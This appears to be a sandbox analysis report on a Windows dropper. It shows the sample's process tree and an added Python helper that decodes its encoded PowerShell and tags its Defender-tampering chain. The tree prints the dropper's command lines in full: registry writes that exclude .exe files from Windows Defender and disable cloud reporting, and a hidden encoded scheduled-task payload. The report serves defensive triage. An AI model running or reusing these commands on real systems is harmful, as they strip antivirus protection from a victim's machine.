Analysis
- max time kernel: 199s
- max time network: 204s
- platform: windows10-2004_x64
- resource: win10v2004-20221111-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20221111-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 23-11-2022 09:13
Static task
- static1
Behavioral task
- behavioral1: Sample file.exe, Resource win7-20220901-en
Behavioral task
- behavioral2: Sample file.exe, Resource win10v2004-20221111-en
General
- Target: file.exe
- Size: 7.3MB
- MD5: 83cce075792f5914f1e2bc7004294e13
- SHA1: 5cb68663c79a606e92bfdca2cbaa559cafb27902
- SHA256: b6bc391c17a37a17d2be2bcbdfc712602c216af7c2dd5d320f94be5bbc16d7a6
- SHA512: c3d0b81a4234a98b264ea95a0453d2ff85c1e28e4cb3d43f4b12bc88b4091091c78d955eb94621a3605c0c5a19ea5f540aa4749906539e340e281161358d546f
- SSDEEP: 196608:91ONTzh25zDhTac+XYtC/xUl9q4fZUpmsN0KLJ2:3OXo4otC/g9q4hUpRV2
Malware Config
Signatures
- Executes dropped EXE (2 IoCs)
  Processes:
    PID 1276  Install.exe
    PID 4016  Install.exe
- Checks BIOS information in registry (2 TTPs, 1 IoC)
  BIOS information is often read in order to detect sandboxing environments.
  Processes:
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  (Install.exe)
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely a geofence.
  Processes:
    Key value queried  \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation  (Install.exe)
- Drops file in System32 directory (1 IoC)
  Processes:
    File created  C:\Windows\system32\GroupPolicy\gpt.ini  (Install.exe)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour; nothing else in this report (no file encryption, no ransom note, no mass file writes) supports that reading for this sample.
- Creates scheduled task(s) (1 TTP, 1 IoC)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
- Enumerates system info in registry (2 TTPs, 2 IoCs)
  Processes:
    Key opened         \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS  (Install.exe)
    Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName  (Install.exe)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  Processes:
    PID 2264  powershell.EXE
    PID 2264  powershell.EXE
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Processes:
    Token: SeDebugPrivilege  PID 2264  powershell.EXE
- Suspicious use of WriteProcessMemory (41 IoCs)
  Processes (source PID and image -> target PID and image; the sandbox logged every edge three times except powershell.EXE -> gpupdate.exe, logged twice):
    964 file.exe         -> 1276 Install.exe   (x3)
    1276 Install.exe     -> 4016 Install.exe   (x3)
    4016 Install.exe     -> 4480 forfiles.exe  (x3)
    4016 Install.exe     -> 1032 forfiles.exe  (x3)
    4480 forfiles.exe    -> 4100 cmd.exe       (x3)
    1032 forfiles.exe    -> 3944 cmd.exe       (x3)
    4100 cmd.exe         -> 4328 reg.exe       (x3)
    3944 cmd.exe         -> 64 reg.exe         (x3)
    4100 cmd.exe         -> 3136 reg.exe       (x3)
    3944 cmd.exe         -> 1304 reg.exe       (x3)
    4016 Install.exe     -> 3196 schtasks.exe  (x3)
    4016 Install.exe     -> 952 schtasks.exe   (x3)
    2264 powershell.EXE  -> 4496 gpupdate.exe  (x2)
    4016 Install.exe     -> 4500 schtasks.exe  (x3)
Processes
(Indentation shows parent/child depth. The installer is a 32-bit process, so its references to C:\Windows\System32 are redirected by WOW64; that is why the forfiles.exe, cmd.exe, reg.exe and schtasks.exe images it spawns live under C:\Windows\SysWOW64.)

- C:\Users\Admin\AppData\Local\Temp\file.exe
  cmdline: "C:\Users\Admin\AppData\Local\Temp\file.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe
    cmdline: .\Install.exe
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe
      cmdline: .\Install.exe /S /site_id "525403"
      - Executes dropped EXE
      - Checks BIOS information in registry
      - Checks computer location settings
      - Drops file in System32 directory
      - Enumerates system info in registry
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\forfiles.exe
        cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          - \??\c:\windows\SysWOW64\reg.exe
            cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
          - \??\c:\windows\SysWOW64\reg.exe
            cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
      - C:\Windows\SysWOW64\forfiles.exe
        cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        - Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\cmd.exe
          cmdline: /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
          - Suspicious use of WriteProcessMemory
          - \??\c:\windows\SysWOW64\reg.exe
            cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
          - \??\c:\windows\SysWOW64\reg.exe
            cmdline: REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
      - C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /CREATE /TN "gZqTuqZWf" /SC once /ST 04:37:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        - Creates scheduled task(s)
      - C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /run /I /tn "gZqTuqZWf"
      - C:\Windows\SysWOW64\schtasks.exe
        cmdline: schtasks /DELETE /F /TN "gZqTuqZWf"
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  (Shown as a separate root because it is launched by the Task Scheduler through the task gZqTuqZWf, which carries the same -EncodedCommand. The blob is base64 over UTF-16LE and decodes to: start-process -WindowStyle Hidden gpupdate.exe /force)
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - C:\Windows\system32\gpupdate.exe
    cmdline: "C:\Windows\system32\gpupdate.exe" /force
- C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
- C:\Windows\system32\svchost.exe
  cmdline: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
- C:\Windows\system32\gpscript.exe
  cmdline: gpscript.exe /RefreshSystemParam
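The tree above is the whole story of this sample's run: a 32-bit installer uses forfiles.exe as a proxy to launch cmd.exe, writes a policy-level Windows Defender exclusion for the exe extension and sets SpyNetReporting (cloud reporting) to 0 in both registry views, then creates, runs and deletes a one-shot scheduled task whose hidden PowerShell payload forces a Group Policy refresh, presumably so the policy values it just wrote are applied. None of that has a dedicated entry in the Signatures list, so an analyst has to read the command lines. The Python below is an added example for this page, not code from the sandbox or from the sample: it pulls the -EncodedCommand blob out of a command line, decodes it as base64 over UTF-16LE, and tags each command line from the tree with the behaviour it shows. The command lines are copied from the report; the tag names and every function name are our own choices.

```python
"""Triage helper for the process tree above: decode the PowerShell
-EncodedCommand blob and tag the Defender policy tampering chain.

Added example for this page, not code from the sandbox or from the sample.
The command lines in SAMPLE_CMDLINES are copied from the report's process
tree; every tag name and function name here is our own."""
import base64
import re

# Constructed input: command lines from the process tree above, in execution order.
SAMPLE_CMDLINES = [
    r'.\Install.exe /S /site_id "525403"',
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gZqTuqZWf" /SC once /ST 04:37:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==',
    r'"C:\Windows\system32\gpupdate.exe" /force',
]

# powershell.exe accepts -e, -ec, -enc and any longer prefix of -EncodedCommand.
ENCODED_RE = re.compile(r'-e(?:c|nc\w*)?\s+([A-Za-z0-9+/=]+)', re.IGNORECASE)
# Policy-managed Defender settings live under this key (lower-cased for matching).
DEFENDER_POLICY = r'hklm\software\policies\microsoft\windows defender'


def decode_encoded_command(cmdline):
    """Return the plaintext behind an -EncodedCommand blob, or None.

    The blob is base64 over UTF-16LE, which is why every other byte of the
    decoded buffer is 0x00 and a plain base64 decode looks like garbage."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode('utf-16-le')
    except (ValueError, UnicodeDecodeError):  # not base64, or an odd byte count
        return None


def classify(cmdline):
    """Tag one command line with the behaviours seen in this report."""
    tags = set()
    low = cmdline.lower()
    if 'reg add' in low and DEFENDER_POLICY in low:
        if '\\exclusions\\' in low:
            tags.add('defender-policy-exclusion')
        if 'spynetreporting' in low and re.search(r'/d\s+0\b', low):
            tags.add('defender-cloud-reporting-off')
    if 'forfiles' in low and '/c' in low:
        tags.add('forfiles-proxy-exec')        # LOLBin used to launch cmd.exe
    if 'schtasks' in low and '/create' in low and 'powershell' in low:
        tags.add('schtasks-runs-powershell')
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        tags.add('encoded-powershell')
        low += ' ' + decoded.lower()           # match on the decoded text too
    if 'gpupdate' in low and '/force' in low:
        tags.add('gpupdate-force')
    return tags


def triage(cmdlines):
    """Map each tag to the indexes of the command lines that carry it."""
    hits = {}
    for i, cmd in enumerate(cmdlines):
        for tag in classify(cmd):
            hits.setdefault(tag, []).append(i)
    return hits


def defender_tamper_chain(cmdlines):
    """True when a policy exclusion is written and a policy refresh is forced."""
    hits = triage(cmdlines)
    return 'defender-policy-exclusion' in hits and 'gpupdate-force' in hits


if __name__ == '__main__':
    for tag, idx in sorted(triage(SAMPLE_CMDLINES).items()):
        print(f'{tag:30} lines {idx}')
    print('decoded task payload:', decode_encoded_command(SAMPLE_CMDLINES[4]))
    print('Defender tamper chain present:', defender_tamper_chain(SAMPLE_CMDLINES))
```

Running it prints the tag for every line and the decoded task payload, start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe child of powershell.EXE in the tree. The point to notice is that gpupdate only becomes visible on the schtasks and powershell lines after decoding: detection logic that string-matches raw command lines sees nothing but a hidden PowerShell launch. The /reg:32 and /reg:64 pair is the sample making sure the value lands in both registry views, so a host check for these keys has to query both as well.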
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Downloads
- C:\Users\Admin\AppData\Local\Temp\7zS58FD.tmp\Install.exe (listed twice in the report with identical hashes)
  Filesize: 6.3MB
  MD5: a35b660762a0c207183dbd2f78012296
  SHA1: abd3ff7c687ce038929d427f346ab007c13ee1c0
  SHA256: babae7c45ab45def5cc67a09ca46fa300776216899200a91b5117da9407b239f
  SHA512: 92800c274f6793be68f90dacc1b2b4fcd24fdb3bcbc0862aa8330001a025ec69ca992625b16dacee730979dc33f933dc90427301499e3333ac751c0ad9debdde
- C:\Users\Admin\AppData\Local\Temp\7zS6198.tmp\Install.exe (listed twice in the report with identical hashes)
  Filesize: 6.8MB
  MD5: a37dbf6bceec57a1792cefc8691b4930
  SHA1: 97a2fd7ba3ff1b231a9f123c5f1e297a6ac7e063
  SHA256: edbb320e9e508bfd12f21fd8debe60c1f9b365135fb21d8a6fc767a1a4822efa
  SHA512: b6d9a058d336a760c72c51e856d02d5641c412acb4f86e8c9da610256bb39910df300d440c07cbca4bb953e939155e0ad9a494eb667c87d2a45d783dfa498d77
- memory/64-146-0x0000000000000000-mapping.dmp
- memory/952-150-0x0000000000000000-mapping.dmp
- memory/1032-142-0x0000000000000000-mapping.dmp
- memory/1276-132-0x0000000000000000-mapping.dmp
- memory/1304-148-0x0000000000000000-mapping.dmp
- memory/2264-154-0x00007FFA60C80000-0x00007FFA61741000-memory.dmp (Filesize 10.8MB)
- memory/2264-151-0x00007FFA60C80000-0x00007FFA61741000-memory.dmp (Filesize 10.8MB)
- memory/2264-152-0x000002095FE00000-0x000002095FE22000-memory.dmp (Filesize 136KB)
- memory/3136-147-0x0000000000000000-mapping.dmp
- memory/3196-149-0x0000000000000000-mapping.dmp
- memory/3944-144-0x0000000000000000-mapping.dmp
- memory/4016-138-0x0000000010000000-0x0000000010D2B000-memory.dmp (Filesize 13.2MB)
- memory/4016-135-0x0000000000000000-mapping.dmp
- memory/4100-143-0x0000000000000000-mapping.dmp
- memory/4328-145-0x0000000000000000-mapping.dmp
- memory/4480-141-0x0000000000000000-mapping.dmp
- memory/4496-153-0x0000000000000000-mapping.dmp
- memory/4500-155-0x0000000000000000-mapping.dmp